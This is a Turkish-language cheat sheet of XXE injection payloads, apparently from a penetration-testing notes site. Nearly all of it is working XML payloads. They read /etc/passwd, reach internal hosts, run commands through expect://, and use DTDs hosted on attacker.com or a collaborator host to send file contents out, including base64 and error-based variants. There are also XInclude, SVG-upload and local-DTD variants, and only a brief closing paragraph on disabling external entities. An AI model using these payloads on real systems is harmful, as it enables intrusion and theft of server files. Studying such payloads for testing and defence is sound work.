XXE Injection

XXE Injection Nedir?

XML external entity injection, bir saldırganın bir uygulamanın XML verilerini işlemesine müdahale etmesine imkan tanıyan bir web güvenlik açığıdır.
Genellikle bir saldırganın uygulama sunucusu dosya sistemindeki dosyaları görüntülemesine ve uygulamanın kendisinin erişebildiği herhangi bir back-end veya external sistemle etkileşime girmesine izin verir.
Bazı durumlarda saldırgan, SSRF saldırıları gerçekleştirmek için XXE güvenlik açığından yararlanarak sunucuyu veya back-end sistemleri ele geçirmek için bir XXE saldırısını kullanabilir.

Yöntemler

Basic XXE

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
&xxe;

XXE SSRF

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://127.0.0.1/"> ]>
&xxe;

XXE RCE

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "expect://whoami"> ]>
&xxe;

Blind XXE

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://COLLABORATOR"> ]>
&xxe;

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE test [<!ENTITY % xxe SYSTEM "http://COLLABORATOR"> %xxe; ]>

Blind XXE ile Veri Çekme

Request Bin: https://pipedream.com/requestbin

Ngrok: https://ngrok.com/

<!--Exploit Server-->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://COLLABORATOR/?x=%file;'>">
%eval;
%exfil;

<!--Target-->
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/exploit.dtd"> %xxe;]>

BASE64 Blind XXE ile Veri Çekme

Request Bin: https://pipedream.com/requestbin

Ngrok: https://ngrok.com/

<!--Exploit Server-->
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://COLLABORATOR/?x=%file;'>">
%eval;
%exfil;

<!--Target-->
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/exploit.dtd"> %xxe;]>

Blind XXE Error Message

<!--Exploit Server-->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;

<!--Target-->
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/exploit.dtd"> %xxe;]>

XInclude XXE

Eğer xml'in tamamını kontrol edemiyorsak sadece parametrelerini kontrol edebiliyorsak denenir.

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>

SVG File Upload

Eğer bir dosya yükleme fonksiyonu svg dosyası kabul ediyorsa çalışabilir.

Apache Batik kütüphanesi kullanılıyorsa çalışır.

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

Local DTD ile XXE

Sadece GNOME ortamlarda çalışır.

<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>

Çözümler

Neredeyse tüm XXE güvenlik açıkları, uygulamanın XML parser kütüphanesinin, uygulamanın ihtiyaç duymadığı veya kullanmayı düşünmediği potansiyel olarak tehlikeli XML özelliklerini desteklemesi nedeniyle ortaya çıkar. XXE saldırılarını önlemenin en kolay ve etkili yolu bu özellikleri devre dışı bırakmaktır.
Genellikle, harici varlıkların çözümlemesini devre dışı bırakmak ve XInclude desteğini devre dışı bırakmak yeterlidir. Bu genellikle yapılandırma seçenekleri aracılığıyla veya varsayılan davranışı programlı olarak geçersiz kılarak yapılabilir.

Kaynaklar

PreviousSSTI NextSSRF

Last updated 3 months ago